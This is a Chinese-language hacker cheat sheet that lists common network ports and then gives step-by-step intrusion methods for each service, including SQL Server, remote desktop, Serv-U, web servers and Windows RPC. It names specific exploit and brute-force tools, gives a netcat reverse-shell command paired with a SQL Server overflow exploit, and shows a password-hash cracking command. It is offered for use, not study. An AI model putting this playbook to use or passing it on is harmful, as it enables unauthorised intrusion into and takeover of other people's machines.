21/tcp FTP 文件傳輸協議
22/tcp SSH 安全登錄、文件傳送(SCP)和端口重定向
23/tcp Telnet 不安全的文本傳送
25/tcp SMTP Simple Mail Transfer Protocol (E-mail)
69/udp TFTP Trivial File Transfer Protocol
79/tcp finger Finger
80/tcp HTTP 超文本傳送協議 (WWW)
88/tcp Kerberos Authenticating agent
110/tcp POP3 Post Office Protocol (E-mail)
113/tcp ident old identification server system
119/tcp NNTP used for usenet newsgroups
220/tcp IMAP3
443/tcp HTTPS used for securely transferring web pages
1433端口入侵
scanport.exe 查有1433的機器
SQLScanPass.exe 進行字典暴破(字典是關鍵)
最後 SQLTools.exe入侵
=============================
對sql的sp2及以下的系統,可用sql的hello 溢出漏洞入侵。
nc -vv -l -p 本機端口 sqlhelloF.exe 入侵ip 1433 本機ip 本機端口
(以上反向的,測試成功)
sqlhelloz.exe 入侵ip 1433 (這個是正向連接)
2. 4899端口入侵
用4899過濾器.exe,掃描空口令的機器
3. 3899的入侵
對很早的機器,可以試試3389的溢出(win3389ex.exe)
對2000的機器,可以試試字典暴破。(tscrack.exe)
4. 80入侵
對sp3以前的機器,可以用webdav入侵;
對bbs論壇,可以試試上傳漏洞(upfile.exe或dvup_delphi.exe)
可以利用SQL進行註入。(小榕的註入軟件)。
5. serv-u入侵(21端口)
對5. 004及以下系統,可用溢出入侵。(serv5004.exe)
對5.1.0.0及以下系統,可用本地提升權限。(servlocal.exe)
======================================
對serv-u的MD5加密密碼,可以用字典暴破。(crack.vbs)
輸入壹個被serv-u加密的密碼(34位長),通過與字典檔(dict.txt)的比較,得到
密碼。如:cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A
6. 554端口
用real554.exe入侵。
7. 6129端口
用DameWare6129.exe入侵。
8. 系統漏洞
利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,
進行溢出入侵。
9. 3127等端口
可以利用doom病毒開的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。
10. 其他入侵
利用shanlu的入侵軟件入侵(WINNTAutoAttack.exe)。